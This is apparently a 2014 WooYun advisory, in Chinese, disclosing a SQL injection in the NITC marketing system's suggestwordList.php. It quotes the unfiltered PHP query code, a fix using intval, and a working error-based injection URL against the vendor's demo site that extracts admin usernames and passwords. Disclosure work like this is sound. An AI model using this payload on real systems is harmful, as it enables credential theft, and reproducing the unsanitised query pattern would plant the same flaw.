当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066683

漏洞标题:NITC营销系统SQL注入漏洞

相关厂商:NITC营销系统

漏洞作者: HackBraid

提交时间:2014-07-02 17:05

修复时间:2014-09-30 17:06

公开时间:2014-09-30 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

官网已复现

详细说明:

注入出现在suggestwordList.php

<?php
define( "IN_LOCK", true );
require( "./includes/init.php" );
$searchWord = trim( $_GET['searchWord'] );
$searchWord1 = str_replace( "\\", "", $searchWord );
if ( $searchWord )
{
    $sql = "select model as keyword from ".$site->table( "product" ).( " where model like '".$searchWord."%' order by model limit 30" );
    $re1 = $db->getAll( $sql );
    $sql = "select product_desc.name as keyword from ".$site->table( "product" )." as product left join ".$site->table( "product_desc" ).( " as product_desc on product.product_id=product_desc.product_id where product.state=0  and (product_desc.name like '".$searchWord."%') and product_desc.language_id=" ).$_GET['language'];// 未作任何过滤,无视gpc
    $re2 = $db->getAll( $sql );
    $re = array_merge( $re1, $re2 );
    if ( empty( $re ) )
    {
        echo "<ul>";
        foreach ( $re as $val )
        {
            echo "\r\n<li>\r\n\t<span class=\"suggword\"><span class=\"keyin\">";
            echo $searchWord1;
            echo "</span>";
            echo substr( $val['keyword'], strlen( $searchWord1 ) );
            echo "</span>\r\n</li>\r\n\r\n\r\n";
        }
        echo "</ul>";
    }
}
?>


官网测试:
http://demo.cnnitc.com/suggestwordList.php?searchWord=a&language=1%20AND%20(SELECT 1 FROM(SELECT COUNT(*),CONCAT(floor(rand(0)*2),(select concat(user_name,0x23,password) from nitc_user limit 0,1))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)

漏洞证明:

d.jpg

修复方案:

$language=intval($_GET['language']);

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论